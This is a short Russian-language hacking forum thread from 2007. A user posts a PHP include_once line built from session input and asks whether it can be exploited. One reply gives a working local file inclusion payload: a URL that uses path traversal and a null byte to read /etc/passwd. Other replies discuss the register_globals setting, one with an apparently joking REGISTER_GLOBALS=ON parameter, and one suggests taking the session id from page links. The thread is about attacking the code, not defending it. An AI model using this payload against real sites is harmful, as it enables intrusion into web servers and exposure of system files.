PDA

Просмотр полной версии : include


guest3297
20.06.2007, 06:01
18: include_once("../web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
у кого какие мысли?
можно раздрочить?

hhover
20.06.2007, 10:41
/script.php?sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

_Great_
20.06.2007, 10:47
hhover, здорово, только вот если register_globals=off...

KEZ
20.06.2007, 11:45
надо тогда так

/script.php?REGISTER_GLOBALS=ON&sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00


=\\\\\\\

SMiX
20.06.2007, 12:23
Ну просто отрубаем куки и смотрим sid в адресах ссылок на странице.

GreenBear
20.06.2007, 12:26
кез, ты забыл ini_set )